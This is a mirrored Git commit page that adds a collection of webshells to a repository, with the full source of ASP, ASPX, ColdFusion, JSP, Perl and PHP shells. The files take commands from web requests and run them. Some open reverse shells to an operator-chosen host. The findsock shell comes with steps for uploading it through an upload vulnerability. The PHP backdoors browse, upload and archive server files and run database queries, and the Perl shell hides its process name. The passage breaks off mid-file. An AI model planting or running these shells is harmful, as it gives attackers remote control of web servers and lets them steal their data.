Mirrors/webshells
2
0
Fork 0
mirror of https://github.com/BlackArch/webshells synced 2024-11-28 23:00:30 +00:00
Code Issues Projects Releases Packages Wiki Activity

added kali linux webshells to start building repo

Browse source
This commit is contained in:
Tyler Bennett 2013-11-12 15:52:12 -05:00
commit f6f3f0aa55
15 changed files with 1398 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
README.md Normal file
View file

@ -0,0 +1 @@
Various webshells. We accept pull requests for additions to this collection.

41
asp/cmd-asp-5.1.asp Normal file
View file

@ -0,0 +1,41 @@
<%
' ASP Cmd Shell On IIS 5.1
' brett.moore_at_security-assessment.com
' http://seclists.org/bugtraq/2006/Dec/0226.html
Dim oS,oSNet,oFSys, oF,szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")
If (szCMD <> "") Then
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
' Here we do the command
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
"""",0,True)
response.write szTF
' Change perms
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
everyone:F",0,True)
Set oF = oFSys.OpenTextFile(szTF,1,False,0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="C" size=70 value="<%= szCMD %>">
<input type=submit value="Run"></FORM><PRE>
Machine: <%=oSNet.ComputerName%><BR>
Username: <%=oSNet.UserName%><br>
<%
If (IsObject(oF)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oF.ReadAll)
oF.Close
Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
End If
%>
<!-- http://michaeldaw.org 2006 -->

55
asp/cmdasp.asp Normal file
View file

@ -0,0 +1,55 @@
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<!-- http://michaeldaw.org 2006 -->

42
aspx/cmdasp.aspx Normal file
View file

@ -0,0 +1,42 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->

43
cfm/cfexec.cfm Normal file
View file

@ -0,0 +1,43 @@
<html>
<body>
<!-- Contributed by Kurt Grutzmacher () -->
Notes:<br><br>
<ul>
<li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c &lt;command&gt;" or wherever cmd.exe is<br>
<li>Options are, of course, the command line options you want to run
<li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
</ul>
<p>
<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr><td>Command:</td><td><input type=text name="cmd" size=50
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
<tr><td>Options:</td><td> <input type=text name="opts" size=50
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
<cfif isdefined("form.timeout")>value="#form.timeout#"
<cfelse>value="5"</cfif>></td></tr>
</table>
<input type=submit value="Exec" >
</FORM>
<cfif isdefined("form.cmd")>
<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#"
arguments = "#Form.opts#"
timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfif>
</cfoutput>
</body>
</html>
<!-- Contributed by Kurt Grutzmacher (http://grutz.jingojango.net/exploits/) -->
<!-- http://michaeldaw.org 04/2007 -->

32
jsp/cmdjsp.jsp Normal file
View file

@ -0,0 +1,32 @@
// note that linux = cmd and windows = "cmd.exe /c + cmd"
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
}
catch(IOException e) {
e.printStackTrace();
}
}
%>
<pre>
<%=output %>
</pre>
<!-- http://michaeldaw.org 2006 -->

91
jsp/jsp-reverse.jsp Normal file
View file

@ -0,0 +1,91 @@
// backdoor.jsp
// http://www.security.org.sg/code/jspreverse.html
<%@
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
% >
<%!
static class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector(InputStream is, OutputStream os)
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader isr = null;
BufferedWriter osw = null;
try
{
isr = new BufferedReader(new InputStreamReader(is));
osw = new BufferedWriter(new OutputStreamWriter(os));
char buffer[] = new char[8192];
int lenRead;
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
{
osw.write(buffer, 0, lenRead);
osw.flush();
}
}
catch (Exception ioe)
try
{
if(isr != null) isr.close();
if(osw != null) osw.close();
}
catch (Exception ioe)
}
}
%>
<h1>JSP Backdoor Reverse Shell</h1>
<form method="post">
IP Address
<input type="text" name="ipaddress" size=30>
Port
<input type="text" name="port" size=10>
<input type="submit" name="Connect" value="Connect">
</form>
<p>
<hr>
<%
String ipAddress = request.getParameter("ipaddress");
String ipPort = request.getParameter("port");
if(ipAddress != null && ipPort != null)
{
Socket sock = null;
try
{
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
Runtime rt = Runtime.getRuntime();
Process proc = rt.exec("cmd.exe");
StreamConnector outputConnector =
new StreamConnector(proc.getInputStream(),
sock.getOutputStream());
StreamConnector inputConnector =
new StreamConnector(sock.getInputStream(),
proc.getOutputStream());
outputConnector.start();
inputConnector.start();
}
catch(Exception e)
}
%>
<!-- http://michaeldaw.org 2006 -->

124
perl/perl-reverse-shell.pl Executable file
View file

@ -0,0 +1,124 @@
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. The author accepts no liability
# for damage caused by this tool. If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only. Users take full responsibility
# for any actions performed using this tool. If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";
# Where to send the reverse shell. Change these.
my $ip = '127.0.0.1';
my $port = 1234;
# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any
# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);
# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";
# Change the process name to be less conspicious
$0 = "[httpd]";
# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
if ($auth) {
unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
cgiprint("ERROR: Your client isn't authorised to view this page");
cgiexit();
}
}
} elsif ($auth) {
cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
cgiexit(0);
}
# Background and dissociate from parent process if required
if ($daemon) {
my $pid = fork();
if ($pid) {
cgiexit(0); # parent exits
}
setsid();
chdir('/');
umask(0);
}
# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
cgiprint("Sent reverse shell to $ip:$port");
cgiprintpage();
} else {
cgiprint("Couldn't open reverse shell to $ip:$port: $!");
cgiexit();
}
# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));
# Wrapper around print
sub cgiprint {
my $line = shift;
$line .= "<p>\n";
$global_page .= $line;
}
# Wrapper around exit
sub cgiexit {
cgiprintpage();
exit 0; # 0 to ensure we don't give a 500 response.
}
# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

34
perl/perlcmd.cgi Normal file
View file

@ -0,0 +1,34 @@
#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
print "<html><body>";
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
if (!$req) {
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
}
else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
# <!-- http://michaeldaw.org 2006 -->

137
php/findsock.c Normal file
View file

@ -0,0 +1,137 @@
// php-findsock-shell - A Findsock Shell implementation in PHP + C
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// (Pair of) Web server scripts that find the TCP socket being used by the
// client to connect to the web server and attaches a shell to it. This
// provides you, the pentester, with a fully interactive shell even if the
// Firewall is performing proper ingress and egress filtering.
//
// Proper interactive shells are more useful than web-based shell in some
// circumstances, e.g:
// 1: You want to change your user with "su"
// 2: You want to upgrade your shell using a local exploit
// 3: You want to log into another system using telnet / ssh
//
// Limitations
// -----------
// The shell traffic doesn't look much like HTTP, so I guess that you may
// have problems if the site is being protected by a Layer 7 (Application layer)
// Firewall.
//
// The shell isn't fully implemented in PHP: you also need to upload a
// C program. You need to either:
// 1: Compile the program for the appropriate OS / architecture then
// upload it; or
// 2: Upload the source and hope there's a C compiler installed.
//
// This is a pain, but I couldn't figure out how to implement the findsock
// mechanism in PHP. Email me if you manage it. I'd love to know.
//
// Only tested on x86 / amd64 Gentoo Linux.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
//
// Here are some brief instructions.
//
// 1: Compile findsock.c for use on the target web server:
// $ gcc -o findsock findsock.c
//
// Bear in mind that the web server might be running a different OS / architecture to you.
//
// 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
// whichever upload vulnerability you've indentified. Both should be uploaded to the
// same directory.
//
// 3: Run the shell from a netcat session (NOT a browser - remember this is an
// interactive shell).
//
// $ nc -v target 80
// target [10.0.0.1] 80 (http) open
// GET /php-findsock-shell.php HTTP/1.0
//
// sh-3.2$ id
// uid=80(apache) gid=80(apache) groups=80(apache)
// sh-3.2$
// ... you now have an interactive shell ...
//
#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <unistd.h>
int main (int argc, char** argv) {
// Usage message
if (argc != 3) {
printf("Usage: findsock ip port\n");
exit(0);
}
// Process args
char *sock_ip = argv[1];
char *sock_port = argv[2];
// Declarations
struct sockaddr_in rsa;
struct sockaddr_in lsa;
int size = sizeof(rsa);
char remote_ip[30];
int fd;
// Inspect all file handles
for (fd=3; fd<getdtablesize(); fd++) {
// Check if file handle is a socket
// If so, get remote IP and port
if (getpeername(fd, &rsa, &size) != -1) {
strncpy(remote_ip, inet_ntoa(*(struct in_addr *)&rsa.sin_addr.s_addr), 30);
// Check if IP for this socket match
// the socket we're trying to find.
if (strncmp(remote_ip, sock_ip, 30) == 0) {
// Check if Port for this socket match
// the socket we're trying to find.
if ((int)ntohs(rsa.sin_port) == (int)atoi(sock_port)) {
// Run command
setsid();
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
close(fd);
execl("/bin/sh", "/bin/sh", "-i", NULL);
}
}
}
}
}

71
php/php-backdoor.php Normal file
View file

@ -0,0 +1,71 @@
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->

89
php/php-findsock-shell.php Executable file
View file

@ -0,0 +1,89 @@
<?php
// php-findsock-shell - A Findsock Shell implementation in PHP + C
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// (Pair of) Web server scripts that find the TCP socket being used by the
// client to connect to the web server and attaches a shell to it. This
// provides you, the pentester, with a fully interactive shell even if the
// Firewall is performing proper ingress and egress filtering.
//
// Proper interactive shells are more useful than web-based shell in some
// circumstances, e.g:
// 1: You want to change your user with "su"
// 2: You want to upgrade your shell using a local exploit
// 3: You want to log into another system using telnet / ssh
//
// Limitations
// -----------
// The shell traffic doesn't look much like HTTP, so I guess that you may
// have problems if the site is being protected by a Layer 7 (Application layer)
// Firewall.
//
// The shell isn't fully implemented in PHP: you also need to upload a
// C program. You need to either:
// 1: Compile the program for the appropriate OS / architecture then
// upload it; or
// 2: Upload the source and hope there's a C compiler installed.
//
// This is a pain, but I couldn't figure out how to implement the findsock
// mechanism in PHP. Email me if you manage it. I'd love to know.
//
// Only tested on x86 / amd64 Gentoo Linux.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-findsock-shell if you get stuck.
//
// Here are some brief instructions.
//
// 1: Compile findsock.c for use on the target web server:
// $ gcc -o findsock findsock.c
//
// Bear in mind that the web server might be running a different OS / architecture to you.
//
// 2: Upload "php-findsock-shell.php" and "findsock" binary to the web server using
// whichever upload vulnerability you've indentified. Both should be uploaded to the
// same directory.
//
// 3: Run the shell from a netcat session (NOT a browser - remember this is an
// interactive shell).
//
// $ nc -v target 80
// target [10.0.0.1] 80 (http) open
// GET /php-findsock-shell.php HTTP/1.0
//
// sh-3.2$ id
// uid=80(apache) gid=80(apache) groups=80(apache)
// sh-3.2$
// ... you now have an interactive shell ...
//
$VERSION = "1.0";
system( "./findsock " . $_SERVER['REMOTE_ADDR'] . " " . $_SERVER['REMOTE_PORT'] )
?>

192
php/php-reverse-shell.php Executable file
View file

@ -0,0 +1,192 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

429
php/qsd-php-backdoor.php Normal file
View file

@ -0,0 +1,429 @@
<?php
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
// This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though :).
function isLinux($path)
{
return (substr($path,0,1)=="/" ? true : false);
}
function getSlashDir($isLinux)
{
return($isLinux ? '/' : '\\');
}
//See if we are on Linux or Windows becuase the paths have to be processed differently
$cwd=getcwd();
$isLinux=isLinux($cwd);
if(!$isLinux)
{
$driveLetter=substr($cwd,0,1);
}
$slash=getSlashDir($isLinux);
$parts=explode($slash,$cwd);
$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));
function cleanPath($path,$isLinux)
{
$slash=getSlashDir($isLinux);
$parts=explode($slash,$path);
foreach($parts as $key=>$val)//Process .. directories and a single .
{
if($val=="..")
{
$parts[$key]="";
$lastKey=$key-1;
$parts[$lastKey]="";
}
elseif($val==".")
{
$parts[$key]="";
}
}
reset($parts);
$fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it
$firstPiece=true;
foreach($parts as $val)//Assemble the path back together
{
if($val != "")
{
$fixedPath .= ($firstPiece ? '' : $slash) . $val;
$firstPiece=false;
}
}
if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error
{
$fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
}
//Make sure there is an ending slash
if(substr($fixedPath,-1)!=$slash)
$fixedPath .= $slash;
return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign");
}
}
elseif(isset($_REQUEST['phpinfo']))
{
phpinfo();
}
elseif(isset($_REQUEST['dl']))
{
if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true)
{
$_REQUEST['dl'] .= $_REQUEST['file'];
if(substr($_REQUEST['dl'],0,1)==$slash)
$fileArr=explode($slash,$_REQUEST['dl']);
header('Content-disposition: attachment; filename=' . $_REQUEST['file']);
header('Content-type: application/octet-stream');
readfile($_REQUEST['dl']);
}
else
{
echo $_REQUEST['dl'];
}
}
elseif(isset($_REQUEST["gz"]))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
$directory=$_REQUEST["gz"];
if(substr($directory,-1)=="/")
$directory = substr($directory,0,-1);
$dirParts=explode($slash,$directory);
$fname=$dirParts[(sizeof($dirParts)-1)];
$archive = time();
exec( "cd $directory; tar czf $archive *");
$output=@file_get_contents($directory . "/" . $archive);
if(!$output)
header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
else
{
header("Content-disposition: attachment; filename=$fname.tgz");
echo $output;
}
header('Content-type: application/octet-stream');
@unlink($directory . "/" . $archive);
}
}
elseif(isset($_REQUEST['f']))
{
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
header("Content-Type: text/plain");
fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d"))
{
echo "<h2>listing of ";
$conString="";
if($isLinux)
echo "<a href='?d=$slash'>$slash</a>";
foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
{
$conString .= $val . $slash;
echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $slash : '');
}
echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod folder to 777)</a> (these rarely work)<br />";
while ($dir = readdir($handle))
{
